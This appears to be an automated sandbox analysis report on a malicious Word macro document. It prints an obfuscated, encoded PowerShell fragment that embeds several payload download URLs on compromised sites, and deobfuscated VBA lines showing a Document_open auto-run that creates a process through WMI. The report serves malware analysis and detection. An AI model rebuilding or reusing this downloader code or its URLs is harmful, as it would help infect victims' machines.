JwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBD

                                              Zxrltp30ofw

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              StringsDecrypted Strings
                                              "F:\kFayEHAHH\ddvLIEC\CfRxAE.EiLcdX"
                                              "O:\qklyMYNC\IkLXI\wrvzJw.AssIJ"
                                              "]b2[s"
                                              "F:\WnCoG\HBbVaCA\fukyDw.vGjESBX"
                                              "O:\hLrrUIYmJ\REMOCDBjE\WEMaHYGD.fCCwYV"
                                              LineInstructionMeta Information
                                              214

                                              Function Xrl25i0p5sd_oj40b(Rttd6rymyw4z)

                                              215

                                              W7t8l1jd1ya = Ubnvz_721a0k0z7gn

                                              Ubnvz_721a0k0z7gn

                                              executed
                                              216

                                              Goto JJjHG

                                              217

                                              Dim SkWVG() as Byte

                                              218

                                              Dim ksQLDZi as Integer

                                              219

                                              ksQLDZi = FreeFile

                                              FreeFile

                                              220

                                              Open "F:\kFayEHAHH\ddvLIEC\CfRxAE.EiLcdX" For Binary Access Read As # ksQLDZi

                                              Open

                                              221

                                              Open "O:\qklyMYNC\IkLXI\wrvzJw.AssIJ" For Binary Access Read As # ksQLDZi

                                              Open

                                              222

                                              Redim SkWVG(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              223

                                              Get # ksQLDZi, , SkWVG

                                              224

                                              Get # ksQLDZi, , SkWVG

                                              225

                                              Get # ksQLDZi, , SkWVG

                                              226

                                              Close # ksQLDZi

                                              226

                                              JJjHG:

                                              228

                                              Xrl25i0p5sd_oj40b = Replace(Rttd6rymyw4z, "]b2[s", Zxrltp30ofw)

                                              Replace("w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s]b2[ss]b2[s]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s]b2[sp]b2[s]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s","]b2[s",) -> winmgmts:win32_process

                                              Zxrltp30ofw

                                              executed
                                              229

                                              Goto hSQRFSr

                                              230

                                              Dim WkbcFJEAD() as Byte

                                              231

                                              Dim WppWDKHVA as Integer

                                              232

                                              WppWDKHVA = FreeFile

                                              FreeFile

                                              233

                                              Open "F:\WnCoG\HBbVaCA\fukyDw.vGjESBX" For Binary Access Read As # WppWDKHVA

                                              Open

                                              234

                                              Open "O:\hLrrUIYmJ\REMOCDBjE\WEMaHYGD.fCCwYV" For Binary Access Read As # WppWDKHVA

                                              Open

                                              235

                                              Redim WkbcFJEAD(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              236

                                              Get # WppWDKHVA, , WkbcFJEAD

                                              237

                                              Get # WppWDKHVA, , WkbcFJEAD

                                              238

                                              Get # WppWDKHVA, , WkbcFJEAD

                                              239

                                              Close # WppWDKHVA

                                              239

                                              hSQRFSr:

                                              241

                                              End Function

                                              Module: Ouz_y28f7ehnqn

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Ouz_y28f7ehnqn"

                                              2

                                              Attribute VB_Base = "1Normal.ThisDocument"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = True

                                              8

                                              Attribute VB_Customizable = True

                                              Executed Functions
                                              APIsMeta Information

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Item

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: CreateObject

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Mid

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Len

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Create

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Il6ap8xlb73

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: C1lvz_08ro0vrbmv6

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              LineInstructionMeta Information
                                              9

                                              Private Sub Document_open()

                                              10

                                              Nr8et74sjtle6s

                                              executed
                                              11

                                              End Sub

                                              Module: Z5ncc5dwidbkjld

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Z5ncc5dwidbkjld"

                                              Reset < >

                                                Executed Functions

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2225450850.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4379d003088ecd3781dfc620ea491fadc17af2933a4a591189f2b03c7982afca
                                                • Instruction ID: 123ffcfb3ff09b3108a48b3377e2cd387a9c8715203259c9339bc20c2f27778b
                                                • Opcode Fuzzy Hash: 4379d003088ecd3781dfc620ea491fadc17af2933a4a591189f2b03c7982afca
                                                • Instruction Fuzzy Hash: 40B18821A4EBC64FE74357785C696A07FF0EF17211F0A00EBD489CB0A3E9589D5AC362
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2225450850.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb45e0f1919c76e51ac2c206f4e7a1e64942c79a00adb2f3a057870c48444d95
                                                • Instruction ID: 45e0828383242e52787c56676832fb4b9bf99acf3c74bac89881d7394344e856
                                                • Opcode Fuzzy Hash: fb45e0f1919c76e51ac2c206f4e7a1e64942c79a00adb2f3a057870c48444d95
                                                • Instruction Fuzzy Hash: 0D41036194E7C24FD74357785C686A47FB0AF13240B1E40EBC488CF0F3E9589A9AC7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2225450850.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 451890eddc72b15ef8939dbab30c1d83951122391fb958ce52dd1b4cc72a2da3
                                                • Instruction ID: 099bb67d4afc7238619b930097a875796164c6c1d43e5e2173dc980fb44bf019
                                                • Opcode Fuzzy Hash: 451890eddc72b15ef8939dbab30c1d83951122391fb958ce52dd1b4cc72a2da3
                                                • Instruction Fuzzy Hash: EC319C21A1EBC64FE79353681C657B03FE0EF57211B4A00E7D488CB1A3D9485D9A83A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions